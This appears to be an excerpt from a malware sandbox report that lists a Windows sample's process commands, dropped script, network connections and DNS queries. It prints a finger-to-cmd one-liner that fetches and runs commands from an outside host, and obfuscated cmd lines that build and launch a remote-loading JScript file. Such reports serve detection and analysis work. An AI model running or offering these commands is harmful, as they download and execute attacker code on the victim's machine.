Technical Information
- '<SYSTEM32>\finger.exe' ok@gwa19dvui8t.amalicalo.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\xqh.js"
- %LOCALAPPDATA%\xqh.js
- 'gw######i8t.amalicalo.xyz':79
- '9d######os5.bessateron.buzz':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'gw######i8t.amalicalo.xyz':79
- 'cl###flare.com':443
- DNS ASK gw######i8t.amalicalo.xyz
- DNS ASK 9d######os5.bessateron.buzz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@gwa19dvui8t.amalicalo.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt TMQI=.j&&SEt VUGAT=vqoCSarqoCS a =qoCS 'scqoCSriqoCSptqoCS:'; b =qoCS 'hqoCSTtPqoCS:'; GqoCSetqoCSObjqoCSecqoCSt(qoCSa+b+'&&sET XR6M=LMKGALMKGA9dn1maaeos5.bessateron.buzzLMKGA?1LMKG...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p V967M="%VUGAT:qoCS=%%XR6M:LMKGA=/%" 0<nul 1>%LOCALAPPDATA%\xqh%TMQI%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\xqh%TMQI%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\xqh.js